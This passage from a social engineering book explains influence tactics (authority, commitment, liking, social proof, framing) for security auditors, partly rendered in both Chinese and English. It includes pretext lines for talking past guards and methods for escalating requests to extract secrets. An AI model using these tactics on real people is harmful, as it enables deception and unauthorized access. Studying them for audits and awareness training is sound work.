Social authority can be used to advantage in social engineering by asking or pressuring the target for information. If the target refuses and is therefore not liked by the leader of the group, the target may fall out of favor with the entire group. Complying with the leader's social authority is perceived to be advantageous.

Social authority is used successfully when it is either directly stated or implied that a previous person or group reacted the way the attacker is asking the target to react. "Yesterday the CFO sent me down to take care of this problem and Joe let me through; he checked all my credentials, did he put them on file?" A simple statement like that utilizes a few forms of authority.

If you comply with authorities mindlessly, you may respond to symbols of authority rather than to reality. Three authority symbols are particularly effective in Western countries; any one of them, with no other evidence of authority, may be enough for a person to be rewarded with compliance:

  • Titles
  • Clothes
  • Automobiles

In an interview I conducted with Dr. Ellen Langer, Harvard psychologist and researcher of persuasion and influence (www.social-engineer.org/episode-007-using-persuasion-on-the-mindless-masses), she talked extensively about mindlessness. She stated that people often do much of their work in a state where there is not much thought; in other words, they are on autopilot. In those positions, the abuse of the authority role is very dangerous. Perceived authority can make someone on autopilot react without limits.

Using the right clothes and body language, and even having a fake business card printed, has worked for many social engineers in presenting an authority stance and keeping their targets on autopilot.

Other forms of authority may come into play for a social engineer beyond the ones outlined here, but these are the most commonly used. Authority is a powerful force when it comes to influencing others, and with a little reasoning and information gathering a social engineer can effectively use an authority pretext to his or her advantage.

Commitment and Consistency

People value consistency in others, and they also want to appear consistent in their own behavior. Generally, people want their words, attitudes, and deeds to be consistent and congruent. Consistency reduces the need to reprocess information and offers shortcuts through complex decisions.

Gut feelings, those moments where you sense that an action is good or bad, or right or wrong, based on past experience, are often indicators that a decision being made might go against previously committed feelings and beliefs. These signals often indicate that you feel pushed to agree to something you don't want.

Gut feelings can also occur when it comes to making commitments. They may indicate that you are uncertain whether your commitment was a mistake. You can ask yourself, "Knowing what I now know, if I could do that again, would I make the same commitment?"

Before looking at how a social engineer can use consistency to gain someone's commitment, consider three examples that might help drive this point home.

  • Marketing: Companies often spend extraordinary amounts of money to gain market share. There is no real return, yet they fight to remain in the share they believe to be profitable. Coca-Cola and Pepsi are great examples of using marketing throughout the decades in the fight to remain visible, yet a commercial will seldom sway a person to switch from Pepsi to Coke. Because the two companies have been "committed" to the war against each other, it seems that when one of them comes out with a new product or marketing idea, the other is not far behind.
  • Auctions: The increased popularity of online auction houses such as eBay has made this principle more visible. People feel a level of commitment to something they place a bid on, and if someone outbids them it is as if they are compelled to bid again. At times they will even raise the bid well past their comfort zone because they feel committed. One classic example is when Robert Campeau bought Bloomingdale's. He paid $600 million more than it was worth. Max Bazerman, author of Negotiating Rationally, quoted a Wall Street Journal journalist as saying, "We are not dealing with price anymore, but with egos…."
  • Carnivals, game houses, and so on: Any time gambling or game houses are involved, a greater risk exists of commitment and consistency being used to persuade people. One columnist, Ryan Healy, an online marketing consultant, wrote a story about taking his daughter to a circus (www.ryanhealy.com/commitment-and-consistency/). He spent $44 on the tickets, $5 to park his car, and then 40 minutes driving to get there. He was committed to being at the circus. His daughter wanted cotton candy, so he committed to a yes by giving her $5. How could cotton candy cost more than that? When the vendor came by and said the bag was $12, how could he back out on his commitment now? He couldn't, and therefore ended up spending $12 on a single cotton candy.

Consistency in this context is defined as what is expected based on previous experience or expectations. That experience or expectation can motivate a target to take an action that can cause a breach. For example, when the tech support guy comes, it is expected that he will go to the server room. That request is consistent with previous experience and expectation. When access to the server room is requested, it is more likely to be fulfilled because it is consistent with what is expected.

Commitment and consistency can be strong factors influencing most people to take actions, give information, or divulge secrets.

A social engineer can make commitment and consistency some of the most powerful tools in his or her arsenal. If a social engineer can get a target to commit to something small, escalating the commitment is usually not too hard.

In his book Influence, Robert Cialdini writes:

The key to using the principles of Commitment and Consistency to manipulate people is held within the initial commitment. That is—after making a commitment, taking a stand or position, people are more willing to agree to requests that are consistent with their prior commitment. Many compliance professionals will try to induce others to take an initial position that is consistent with a behavior they will later request.

The social engineer hoping to employ the technique of commitment and consistency usually tries to get the target to divulge a small piece of information toward the overall intended goal. By getting the subject to remain consistent with things he or she has already said, the attacker may get the subject to reveal even more information.

On the other hand, the attacker must remain consistent with what he is asking. The attacker should start small and escalate the information gathering.

To use an unrealistic example, an attacker should never start off by asking for the nuclear launch codes. That request will be denied, and the attacker will be left with few options but to backpedal. However, starting small and escalating the value of the information requested with each new piece of gathered information will seem like a more natural progression and will not appear so obvious to the victim.

Going slowly and progressively can be hard, as social engineers are often impatient and want to get the "password" right now. Playing it cool and remaining patient can make this avenue rewarding. Clearly defining, maybe even writing out, a path that you can use on each audit can help you go into the audit with clearly defined goals and a path to accomplish them.

I created a chart, shown in Figure 6-2, that illustrates how a social engineer may visualize this path to obtaining information using commitment and consistency.

Getting a target to verbally commit to a certain action can force the target onto a certain path of action. Cialdini states, "The commitment and consistency rule states that once we make a decision, we will experience pressure from others and ourselves to behave consistently with that decision. You can be pressured into making either good or bad decisions depending on your past actions."

Maybe you have felt this if you ever verbally told your wife or spouse that you wanted to lose weight. That verbal "commitment" leads to a lot of pressure to hold up your end of the "bargain."

Sometimes, ending up disagreeing with yourself can be hard, almost impossible. Everyone has, at one point or another, muttered the phrase "I'm sorry, I changed my mind" at least once. When we do, we hang our heads in shame, our voice tones drop, and we sound sad. Why? We have just broken a commitment we made, and we feel guilty for doing it.

Figure 6-2: Clearly defining your goals can help you to obtain an information commitment.

Even small, seemingly insignificant commitments can lead to exploitation. For example, a phone conversation often used by solicitors goes something like this:

"Hello, how are you today?"

You answer, "I am doing great."

Now, prepare for the exploit: "That is good to hear, because some people who are not doing so great can use your help."

You can't go back on what you said now, because you are still doing great and committed to it.

This is not to say that you need to be so paranoid that you cannot even answer simple questions without fear of exploitation, but being aware that one commitment does not mean you must commit to everything that follows is vital. I once worked with a guy who could literally get anyone to do the worst jobs and make them think it was their idea. Ensuring their commitment was one method he used.

If you committed to a path of agreeing with him on certain things, which was almost impossible not to do because he got you to say "yes" up front, then you had to continue to say "yes." Those yeses led down one path, and that path went right to where he wanted: agreeing to the job he needed done.

Being aware that it is okay to say "no" can save you from committing to something that could be disastrous. Yet sometimes we convince ourselves that saying "no" is some form of cardinal sin that needs many prayers to be forgiven.

In the earlier example of the frozen meat salesman, my wife is a very self-aware person. Knowing she might be manipulated by a "seemingly good deal," she came inside to get me because I am a "jerk."

One of the best examples I have heard that really shows the power of commitment is a social experiment done by Dr. Thomas Moriarty in 1972. He sent an assistant to the beach as a "victim" with a portable radio. The victim sat in his chair listening to his radio for about 10 minutes, then got up to buy a drink.

While he was gone, another assistant, the "criminal" whom no one knew was working with him, came by to "steal" the radio. Only 4 out of 20 people, just 20%, stopped the thief from taking the radio.

The researchers then upped the ante in the next round. Before the "victim" left to buy the drink, he would ask one of the neighboring sunbathers to watch his radio for him. What do you think the change was?

Now a staggering 19 out of 20 stopped the thief, some even resorting to violence. Why the staggering difference? Commitment and consistency. The researcher obtained a commitment from the neighboring sunbathers, and that caused them to act consistently with that commitment. In my opinion, these are amazing statistics that show the power of this influence method.

A social engineer can effectively use this method of influence to get a target to commit to even a small act or a small "yes" and use that commitment to escalate into a larger set of actions.

Liking

People like people who like them. As tongue-twisting as that phrase is, it is a very true statement. Understanding the full depth of that statement gets you much closer to mastering persuasion.

When I say understand the depth, I really mean it, because that sentence has much more to it than meets the eye.

This statement isn't saying that people who like you will respond well. Salespeople are often taught that people buy from people they like. That is true, but it is not the point. It also isn't saying that people must like you; it is saying that you must like people, and then they will like you in return.

This task is not as easy as it sounds, because liking someone cannot be faked. As discussed in Chapter 5, smiles and happiness are very hard to fake. You must go into the situation genuinely caring for the person you are trying to influence. Caring for people and their feelings is not a standard practice of the malicious social engineer; therefore, they often rely on charm. Charm can work on a short-term basis, but in the long term, liking people is a practiced and learned skill.

Liking is used extensively in marketing. In 1990 Jonathan Frenzen and Harry Davis published a study entitled "Purchasing Behavior in Embedded Markets" (www.jstor.org/pss/2626820) that examined why Tupperware parties are so successful. All of their research pointed to this principle of liking.

The researchers concluded that most people bought because they wanted the hostess to be happy, to help a friend, and to be liked. How embarrassing to go to a party like this and not buy anything! That fear of not being liked is what drives most people to purchase at these parties, and it has little to do with wanting more Tupperware.

Other surveys and studies have compared the trust people place in "tips or advice" from those they consider friends with the trust they place in complete strangers or, worse, people they don't like. A friend can give bad advice, and one may be more prone to follow it than good advice from a person one doesn't like.

From a social engineering aspect, the concept of liking is a powerful tool. Not only do you have to be likeable and win people's trust, but you also have to be genuinely interested in people. This concept goes back to the discussion of pretexting in Chapter 4. When you pretext, you are not merely acting out an idea or belief; you must become the person you are pretexting, and that role is what your life is about. If you can do that, then the step of liking becomes easier. Your pretext will be truly interested in helping, liking, or assisting that person.

One last aspect of liking that is important for you as a social engineer is physical attractiveness. Humans tend to automatically "like" those we find attractive. As vain as that sounds, it is the truth. Some serious psychological principles back up this idea.

What is beautiful is good. In 1972 Berscheid, Walster, and Dion performed a study entitled just that, "What Is Beautiful Is Good," which produced some very profound findings. Participants were asked to rate photos of three individuals of low, medium, and high attractiveness. Based on the photos alone, they were to rate the people for personality traits, overall happiness, and career success.

They then compiled the ratings, averaged them, and found that people who were deemed attractive were rated as more socially desirable, as having better occupations, and as happier and more successful. The study proved that people tend to link beauty with other successful qualities, and this alters their opinions and their ability to trust someone.

This study is an example of a phenomenon called the halo effect, where one particular trait influences or extends to the other qualities of the person. It has been proven to bias a person's decisions, with a tendency to focus on the good traits of the other person. I have archived a copy of this amazing study at www.social-engineer.org/wiki/archives/BlogPosts/BeautifulGood.pdf.

In other words, if someone views you as beautiful, then that good trait extends to other judgments that person makes about you. This halo effect is often used in marketing. Beautiful people are given products to drink, eat, and wear, and other people will automatically assume these things are good, possibly thinking, "Well, it must be good if this beautiful person is using it."

Recently I saw an ad on television that really hit this point home; the ad makes fun of marketing efforts but does so very intelligently. An attractive young woman comes on the screen wearing beautiful clothing and says, "Hi, I am a believably attractive 18–24 year old female."

Using an attractive woman who is not overly attractive but believably real, someone we normal people can look up to, is marketing genius. We can't really tell her age, but her beauty places her somewhere between 18 and 24.

"You can relate to me because I am racially ambiguous."

Again, this is another stroke of marketing genius. She is not black, white, or Native American; we can't tell, but she may be of mixed heritage, which may be attractive to many races and is non-offensive to most.

"I am in this commercial because market research shows girls like you love girls like me."

Her beauty and self-assuredness make us like her; she is well dressed and well spoken, and we want to know her.

The camera then pans to different shots of her doing things like kickboxing, cheerleading, and playing with flowers. By showing viewers she can do all these things while being as beautiful as she is, the ad makes us perceive her as strong and powerful, and everything she is doing as good.

"Now I am going to tell you to buy something…"

She then goes on to sell tampons. This commercial is genius, because the advertiser actually outlines, uses, and educates the consumer on the methods used to make you want to buy. Yet despite all that, within this commercial lies this principle of liking and the halo effect.

Knowing all this about the importance of liking, what can you do? I have a hard enough time being an attractive male, let alone an attractive female. Because endless trips to my local plastic surgeon are out, is there anything a social engineer can do to capitalize on this principle?

Know your target. Know what is and isn't acceptable to him or her. How does he dress, and what does he consider bad and good? Too much jewelry, makeup, or some other aspect of dress can turn off a target. Suppose you are auditing a doctor's office and your pretext is a drug sales representative. You know that most sales reps wear suits, have perfect hair, and look, smell, and act confident, a trait of many attractive people, so walking in with spiked hair and facial piercings would draw more attention to yourself than to your goal.

You must know your target so you can successfully look the way the target would expect. Wear clothing, hairstyles, jewelry, and makeup that will not shock, surprise, or disgust the target. Putting her mind at ease can go a long way toward creating an atmosphere where she will like you, which builds trust and leads to success.

A social engineer can look for things to compliment a target on. When engaging a target, and when appropriate, starting the conversation with a simple complimentary question (such as "Those are nice shoes; where did you buy them?") is useful. People like positive reinforcement. When someone receives compliments from another person, he tends to stay engaged in order to receive more positive reinforcement. These compliments tend to reinforce a target's self-image, making him feel as if you have a greater-than-normal understanding of him.

The University of Minnesota issued a paper on reinforcement (www.cehd.umn.edu/ceed/publications/tipsheets/preschoolbehaviortipsheets/posrein.pdf) which states that too much positive reinforcement can have a negative effect. They call it satiation: when reinforcement is given too often, it begins to lose its effectiveness. To combat this effect, you can use positive reinforcement backed up by a question. This method reinforces positive behavior or attitudes but also makes people happy, as they are asked about themselves.

Four steps can help you get people to like you:

1. Project a confident and positive attitude.

2. Establish rapport.

3. Synchronize, or get in tune with, the target and surroundings using the methods mentioned earlier.

4. Communicate effectively.

In his book How to Make People Like You in 90 Seconds, Nicholas Boothman says that people decide whether they like someone within the first two seconds of meeting him or her. After an impression is made, changing it can be hard. He promotes coming into an interaction with a good attitude. Having the ability to speak up and communicate effectively in many different situations can make you more likeable. What you project onto others is what they will feel. Your facial expressions, body language, dress, and so on must all project a good, positive attitude.

Boothman makes some key points in his book about being likeable, including asking lots of questions, listening actively, and being interested in what people are saying. Doing these things will help people like you.

A social engineer may need to practice it, but being likeable will go a long way toward succeeding in your audits.

共识或社会认同

Consensus or Social Proof

 

Social proof is a psychological phenomenon that occurs in social situations when people are unable to determine the appropriate mode of behavior. You can easily assume a behavior is appropriate if you see others acting or talking a certain way. Social influence in general can lead large groups of individuals to conform, whether the choice is correct or mistaken. This behavior is common when people enter unfamiliar situations and have no frame of reference for how to deal with them; they mirror the behavior of others whom they assume are more familiar with the situation and therefore better informed.

In his book Influence: The Psychology of Persuasion, Dr. Robert Cialdini states, “Social proof—people will do things that they see other people are doing. For example, in one experiment, one or more confederates would look up into the sky; bystanders would then look up into the sky to see what they were seeing. At one point this experiment was aborted, as so many people were looking up that they stopped traffic.”

I will outline some excellent examples of social proof that will help you see how powerful it is, and whether you have ever fallen for it.

Social proof is used heavily in marketing. It is used in sales when high sales numbers are released, demonstrating to potential customers that the product is popular. Another example is when companies release shirts with logos or slogans printed on them, so that the wearer gives an implicit endorsement.

Social proof is driven not just by large groups but also by high-profile individuals. For instance, a single celebrity becoming associated with a product will make others want to be associated with the celebrity’s positive traits, so they use the same product.

Many examples of celebrity endorsements exist; here are just a few:

• A major supplier of berets was able to get Samuel L. Jackson to endorse its product, the Kangol hat.

• Through 2010, Maria Sharapova was paid millions of dollars per year to endorse Canon products.

• Catherine Zeta-Jones endorses T-Mobile products in its TV commercials and print ads, to the tune of $20 million.

• In 2009, Tiger Woods was paid over $100 million for his off-course product endorsements, including AT&T, Gatorade, Gillette, Nike Golf, and TAG Heuer, to name a few.

• Michael Jordan still earns $45 million per year for his Nike endorsements.

There are even some more unusual celebrity endorsements, such as:

• Ozzy Osbourne endorsing I Can't Believe It's Not Butter

• Mikhail Gorbachev endorsing Louis Vuitton

• Ben Stiller endorsing the alcoholic drink Chu High to Japanese viewers

Why do companies spend so much just to have a celebrity endorse their products? It is exactly how social proof works. When consumers see famous people they admire and adore wearing, using, or even speaking about those products, it is as if they are being told directly by that person how amazing the product is. Many will view it as solid proof that these products are worth every penny.

In its marketing efforts, the beret company said its hats were some of the hottest on the market, and the proof was that Mr. Jackson could be seen wearing them.

Advertisers often say things like “largest selling” or “hottest product” to convince their audience that many of their peers back these claims.

In addition, the Media-Studies.ca website posted an article on influencing targets using social proof (www.media-studies.ca/articles/influence_ch4.htm):

“Experiments have found that the use of canned laughter causes an audience to laugh longer and more often when humorous material is presented and to rate the material as funnier. In addition, some evidence indicates that canned laughter is most effective for poor jokes.” The question is: why does it work, especially when the laugh track is often so obviously fake? To answer this question, Cialdini posits the principle of social proof: “One means we use to determine what is correct is to find out what other people think is correct…We view a behavior as more correct in a given situation to the degree that we see others performing it.”

As with the other “weapons of influence,” social proof is a shortcut that usually works well for us: if we conform to the behavior we see around us, we are less likely to make a social faux pas. The fact that canned laughter provokes an automatic response in audiences suggests that auditory cues are powerful stimuli because they influence us at a level of consciousness that is difficult to critique.

Other examples are how bartenders or other establishments will “salt the tip jar” by placing a few bills in the jar. As a patron approaches to purchase food, the implication is, “Many before you have tipped me, why don’t you?” And it works, too!

One of the most profound pieces of research in this field, and one that really stands out, was done by Dr. K. D. Craig in 1978. Dr. Craig devoted his life to the study of pain and its effect on people. In 1978 he published a paper entitled “Social Modeling Influences on Sensory Decision Theory and Psychophysiological Indexes of Pain” (www.ncbi.nlm.nih.gov/pubmed/690805?dopt=Abstract), in which he described his experiment as follows:

Subjects exposed to social models dissimulating tolerance or intolerance generally exhibit matching behavior in their verbal ratings of painful stimulation. It has been unclear, however, whether these changes reflect voluntary alteration of evidence or genuine changes in distress.

This study used alternative measures and controlled for methodological limitations of earlier studies by examining non-palmar skin potential in addition to palmar skin conductance and heart rate indexes of psychophysiological response to electric shock, and by evaluating verbal expressions of pain with sensory decision theory methodology.

Several indexes of non-palmar skin potential and heart rate reactivity exhibited lower reactivity in the tolerant group. Tolerant modeling was also associated with decreases in subjective stress. The results were consistent with the position that changes in pain indexes associated with exposure to a tolerant model represented variations in fundamental characteristics of painful experiences as opposed to suppression of information.

To boil this down, what he basically did was shock people and ask them to rate their pain level. Then, using similar but varying shocks, he ran the same test in the presence of a person who was “tolerant” to the pain; it was as if a magical cloak had been thrown over the subjects, because they were now more tolerant to pain.

This experiment points to the fact that part of the motivation to show, exhibit, or feel pain is related to how others around you act. The people in the study weren’t just acting as if it hurt less: their skin reactions and heart rate actually exhibited less pain reaction when a tolerant model was in place.

For a humorous example of the power of social proof, check out a video from the old television show Candid Camera at www.social-engineer.org/framework/Influence_Tactics:_Consensus_or_Social_Proof.

This video shows subjects being influenced to face different directions in an elevator, at one point even facing the back because everyone else is doing it. There were four to five participants in the elevator acting as patrons. At set intervals, the participants would all turn to the left, to the right, or face backwards. After a few seconds, a hidden camera would catch the unsuspecting subject complying and facing the same direction, removing a hat, or taking some other action.

In the hands of a social engineer, social proof can be a deadly tool. This principle can be used to stimulate a person’s compliance with a request by informing him or her that many other individuals, perhaps some who are role models, took the action or behavior you are trying to get this person to take. Social proof can provide a shortcut for determining how to behave. But at the same time it can make targets vulnerable to the manipulations of others who seek to exploit such influence.

Social proof is most influential under two conditions:

• Uncertainty: When people are unsure and the situation is ambiguous, they are more likely to observe the behavior of others and to accept that behavior as correct.

• Similarity: People are more inclined to follow the lead of others who are similar to themselves.

These conditions are where a social engineer can use social proof. Stating, or even implying, that many people before this target have taken a particular action can increase your chances of success.

In one social engineering situation where I was stopped by a leery security guard, I simply acted confused as to why I was stopped and said, “Yesterday, Jim let me in after checking all my credentials. I just figured I was still on record.”

The present security guard, hearing that Jim approved me, allowed me to pass without question. Social proof won’t always work so easily, but it is a very powerful force.

The principles outlined in this section are some of the deadliest influence tactics used today. These tactics can literally give a social engineer the power to motivate people, move them, and cause them to react in ways that put them under the social engineer’s control.

Remember that influence and the art of persuasion is the process of getting someone else to want to do, react, think, or believe in the way you want them to. Creating this motivation within a target is a powerful force; it is a social engineer’s superpower. The principles outlined in this chapter can make that superpower a reality, but not without consequence and lots of work.

What do I mean by that? I have often found that after I practice a certain skill and become proficient at it, “turning it off” is very hard. This trait may sound attractive, but being cautious about who you are influencing, especially as a social engineer, is a good idea. To ingrain these skills into your personality, use them to help others. For example, when you start to practice reading microexpressions, and even using them to manipulate a target, the initial response might be to think you have some mystical power that allows you to almost read minds. This is where caution is wise. Practice the skill and work toward perfecting it, but don’t assume you know it all.

If you can influence someone to stop smoking, to start working out, or to be healthier, then you will learn to tap into these skills at will to benefit others, and using them in your social engineering practice is not a farfetched idea.

Many of these skills require you to actually be interested in people, care about them, and empathize with them. If these are not natural abilities for you, then you must work hard to obtain them. I urge you to take that time, because the skills in the preceding section can lead you to being a grand master social engineer.

Imagine if you could alter what you think to the extent that gaining these skills became easier. Now imagine, too, if you could alter the thinking of your targets so that what they experience is exactly what you want them to experience. Literally altering the reality of those you interact with, including yourself, is the next topic, and it will just blow you away.

Altering Reality: Framing

Framing has been defined as information and experiences in life that alter the way one reacts to the decisions one must make. From a non–social engineer point of view, framing is your own personal experiences, and the experiences of others, that you allow into your conscious mind to alter the way you make decisions.

Grocery stores use framing by putting “75% lean” on a package of ground meat as opposed to “25% fat.” These terms mean the same thing (both describe 25% fat content), but one sounds healthier and is more appealing to the buyer, and that is why stores use 75% lean as opposed to labeling the actual fat content.

The preceding example is simple, but it also helps to show the power of framing. Simply presenting the facts in a different way can make something seem good that would normally be considered bad.

The following sections look at a few areas where framing is often used so you can see how powerful it is.

Politics

Framing has long been used in politics. Simply the way campaigns or messages are worded can make a huge difference in the way the public perceives a message.

Consider, for example, George Lakoff, a professional cognitive linguist. In an interesting observation on framing in politics, he describes the difference in how people perceive the phrases “Counterterrorism as law enforcement” versus “Counterterrorism as war.” When the 9/11 attacks occurred, Colin Powell argued that they should be treated as crimes. When the public demanded more action and stricter policies, then-President Bush announced the “War on Terror” campaign.

Another example is the Social Security program in the United States. The name implies that this program can be relied upon to provide security for the future.

Yet another example is the difference between the terms bailout and economic stimulus. Bailout met with a lot of opposition because it paints a word picture of bailing water out of a sinking boat. But economic stimulus paints the mental picture of helping the economy by stimulating it. Both programs did almost the same thing, but simple wording made the latter term more acceptable.

Judith Butler, Berkeley professor and author of the critically acclaimed book Frames of War, wrote about how framing is used, especially in Western cultures, when it comes to political agendas and war. In her book she explores the media’s portrayal of state violence:

This portrayal has saturated our understanding of human life, and has led to the exploitation and abandonment of whole peoples, who are cast as existential threats rather than as living populations in need of protection. These people are framed as already lost, to imprisonment, unemployment, and starvation, and can easily be dismissed. In the twisted logic that rationalizes their deaths, the loss of such populations is deemed necessary to protect the lives of “the living.”

These are just a few examples of where framing is used in politics.

Using Framing in Everyday Life

The term frame of reference is defined as a set of ideas, conditions, or assumptions that determine how something will be approached, perceived, or understood. This definition can be helpful in understanding how framing is used.

Anything that can alter people’s perceptions or the way they make decisions can be called framing. A friend tells you that last week she went to town and took a certain route that was backed up for 10 miles due to some construction. You might then take a longer route to avoid the potential delay, even though the news your friend shared is more than a week old.

Our minds are designed not to like “clutter” or chaos. When presented with cluttered things, our brains try to make order out of them. One interesting example of this is found in Figure 6-3.

Figure 6-3: Can you alter your reality frame to change what you see?

In your present frame, what is the background and what is the foreground? Your mind will insist on finding familiar patterns in things. We do it in clouds, space, and inanimate objects. Humans also tend to see faces in these things.

In Figure 6-4, can you alter your frame and change which is the image and which is the background? Try focusing on the opposite of what you noticed first.

Another very interesting example of how human brains find order in chaos is illustrated in an e-mail that circulated over the last few years, which looked like this:

O lny srmat poelpe can raed tihs.

I cdnuolt blveiee taht I cluod aulaclty uesdnatnrd waht I was rdanieg. The phaonmneal pweor of the hmuan mnid, aoccdrnig to a rscheearch at Cmabrigde Uinervtisy, it deosn’t mttaer in waht oredr the ltteers in a wrod are, the olny iprmoatnt tihng is taht the frist and lsat ltteer be in the rghit pclae. The rset can be a taotl mses and you can sitll raed it wouthit a porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe. Amzanig huh? yaeh and I awlyas tghuhot slpeling was ipmorantt! if you can raed tihs psas it on !!

I am not sure whether this is actually Cambridge research, but the interesting part of that forwarded e-mail is how many of us who use English as our main language, or are very proficient at reading English, are probably able to read that paragraph without much effort, because our brains are very efficient at making order out of chaos.

Many times the framing is more subliminal. Companies use this in marketing in the hope that subliminal messages will alter the target’s perception of their product. Many times companies will use subtle framing measures to plant an idea.

For example, Figure 6-4 shows something you have probably seen many times.

Figure 6-4: Can you spot the frame?

After I show you this, you will never see the FedEx logo the same way again—there is an arrow in the FedEx logo. In an interview, the creator of the logo said he embedded the arrow in the logo to plant an idea about FedEx’s services. It is there to communicate movement, speed, and the dynamic nature of the company.

Did you find it yet? Look at Figure 6-5, where I outlined and circled the arrow.

Figure 6-5: The arrow indicates quality service that is always moving.

FedEx is not the only company that utilizes framing. For decades companies have been embedding messages into logos in an effort to frame the thinking of the viewer, so that they remember, think about, and view the company in the way it wants. The next few figures show more examples.

Did you ever notice Amazon’s logo for its embedded framing message (see Figure 6-6)?

Figure 6-6: Do you see the smiling happy customer?

Amazon has two framed messages in its logo. One is the happiness you will feel as a customer, represented by the smile in the image, but the smile is also an arrow. That arrow points from A to Z, indicating that Amazon has everything from both points and in between.

Another great example is the Tostitos logo. This is a very social logo, as you can see in Figure 6-7.

Figure 6-7: Does this logo make you want to share a chip with someone?

The two T’s in the middle are people sharing a chip over a bowl of salsa. In 2004, Tostitos issued a press release that said, “Tostitos plays a role as a ‘social snack,’ helping to create connections between friends and families, whether it’s at a party, during the ‘big game,’ or at simple everyday get-togethers. The new logo brings to life this idea of making connections.”

These examples are just a small subset of how framing is used in marketing. Framing is not all about images; mostly it is about the value that the target perceives. The perception the target has of an item can increase or decrease its value. Take an expensive clothing store—when you walk in, everything is hung neatly, pressed, and perfect. The perception can be that the clothing is worth the exorbitant amount on the price tag. Yet if you were to take one of the ties, shirts, or other pieces of clothing off the rack, bring it to a discount store, and throw it into a large bin full of other clothes marked “Discount 75% off,” your perception of the value of that item of clothing would go way down.

Marketing gurus play off this phenomenon in an effort to frame the public’s perception of value. Many companies have been so successful at framing that people have coined phrases from their brand names, creating a whole genre of words to describe products.

For example, everyone has probably said, “Will you make a Xerox of that?” even if the machine is not a Xerox but another brand. Xerox is the brand name, not the type of machine.

A more recent example is that no matter what search engine you use, people often say, “Did you Google it?” because Google has become synonymous with searching on the Web. And people say, “Hand me a Kleenex, please,” when really they want a tissue.

Others that you might not even be aware were brand names (unless you are of the generation in which they were introduced) include:

• Aspirin is a trademarked product of Bayer.

• Thermos is a product name of the Thermos GmbH company.

• Band-Aid is a trademark of Johnson & Johnson.

• Frisbee was a trademark of Wham-O.

All of those names became so popular that people’s frame of reference eventually encompassed any similar product. I never take aspirin—I usually use another brand—but I will always ask for “two aspirin,” be given the brand I use, and be happy.

Volumes of information exist about framing, but boiling this information down to some main principles you can use as a social engineer is necessary. The preceding information set a very detailed stage for what framing is and how it is used in different areas of life. Before moving to the social engineering arena, take a look at the different types of frame alignment.

Four Types of Frame Alignment

Two researchers, David Snow from the University of Arizona and Robert Benford from the University of Nebraska, wrote a paper entitled “Clarifying the Relationship Between Framing and Ideology in the Study of Social Movements” (www.social-engineer.org/resources/book/SNOW_BED.pdf).

Snow and Benford argue that when individual frames become linked in congruency and complementariness, frame alignment occurs, producing frame resonance, which is key to the process of a group transitioning from one frame to another. Snow and Benford then outline four conditions that affect framing efforts:

• “The robustness, completeness, and thoroughness of the framing effort”: Snow and Benford identified three core framing tasks, and the degree to which these tasks are attended to will determine how much each participant gets involved.

The three steps are:

1. Diagnose the frame for problems.

2. Analyze it for solutions.

3. If successful, issue a call to action.

在构图上投入的努力越多,人们就越有机会号召被构图的人采取行动。
 
     
  • “提出的框架与更大的信仰体系之间的关系”:如果与核心信仰或信仰体系的价值不存在联系,人们往往会忽视框架或提出的框架。
  •  
 

The more effort put into the frame the better chance the person has to call those he is framing into action.
 
     
  • “The relationship between the proposed frame and the larger belief system”: People tend to discount frames or proposed frames if a link does not exist to a core belief or a value of their belief system.
  •  
 

 

试图说服一个认为吃肉是对动物残忍的人去街上一家有特色牛排店,这肯定会失败。框架必须与一个人的信念核心相吻合才能成功(除非你的目标是用框架来改变他或她的核心信念);这是成功的必要条件。

Trying to convince a person who holds a belief that eating meat is cruelty to animals to go to the steak place down the road that has a great special will certainly fail. The frame must fall with the core of a person’s beliefs to be successful (unless your goal is to use a frame to change his or her core beliefs); it is imperative to success.

 

一项大规模的框架改变尝试通过备受争议的反吸烟广告进行,志愿者在烟草业大楼前堆放尸袋。尸袋代表每分钟、每小时或每天有多少人死于吸烟。希望改变那些支持吸烟的人的框架,让他们考虑吸烟者的死亡人数。
 
     
  • “框架与参与者现实的相关性”:框架必须与人(目标)相关。它必须可信且可测试,因为它与目标的经验相关。
  •  
 

A large-scale framing change attempt was made through the controversial anti-smoking commercials where volunteers pile up body bags in front of a tobacco industry building’s front door. The body bags represent how many people die every minute, hour, or day from smoking. The hope is to alter the frame of those who support smoking to think about the death toll for those who smoke.
 
     
  • “Relevance of the frame to the realities of the participants”: The frame must be relevant to the person (target). It must be creditable and testable as it relates to the target’s experience.
  •  
 

 

你不能指望使用营销框架来鼓励人们在一个连一天的食物都买不起的地方乘坐豪华游轮。无论你在营销中多么擅长使用框架,它都只会失败。要使框架保持一致,它不仅必须相关,还必须可证明以保持价值,即使这种证明只是在目标人群的脑海中。

You can’t expect to use a marketing frame that will encourage people to take a luxury cruise in a land where people cannot afford food for the day. No matter how good you are at using framing in marketing, it just would fail. For the frame to align, it must not just be relevant but must also be provable in order to hold value, even if that proof is just in the mind of the target.

 

例如,2007 年,一家非常受欢迎且值得信赖的新闻媒体《洞察杂志》(与《华盛顿时报》同属一家公司)报道称,当时的总统候选人奥巴马曾就读于一所全穆斯林学校,该学校以教授非常激进和基本的伊斯兰教而闻名。当这则新闻发布时,许多人立刻相信了它——为什么?因为它符合他们的现实情况,看起来可信,而且来自一个“值得信赖”的消息来源。

For example, in 2007 a very popular and trusted news source, Insight Magazine (which is owned by the same company as The Washington Times) reported that then-presidential candidate Obama had attended an all-Muslim school that was known for teaching a very radical and fundamental form of Islam. When this news report was released many believed it right away—why? It fit into the frame of their reality, it seemed credible, and it came from a “trusted” source.

CNN, another reputable source for news, sent out investigators, discovered that story was false, and reported its findings.

This is a good example of altering people’s frames on a matter using a very trusted source for “truth”—news media. People who wanted to believe that Obama was a radical Muslim ran with that story, and the news went wild. When research revealed the story to be false, many people’s thinking was altered again.

  • “Cycles of protest; the point at which the frame emerges on the timeline of the current era and existing preoccupations with social change”: What is happening in the world can affect a social frame. Think back a few years; if the idea of full-body X-ray scans had been proposed to companies in the U.S. or other Western cultures, the idea would have been thrown to the wind.

Activists for privacy would have fought against the idea and won, simply by using the idea of someone being able to see your private areas and potentially saving that picture to mock or sexually harass you. This argument would have outweighed the sales efforts of the creators of the machines. Yet, after the attacks in America on September 11 and the subsequent rise of terrorist activity, those machines are being installed at airports around the globe despite the cries of activists, who even argued with the power of child pornography laws on their side.

Why? The social frame of how to remain safe has been altered, allowing a new breed of decision to enter.

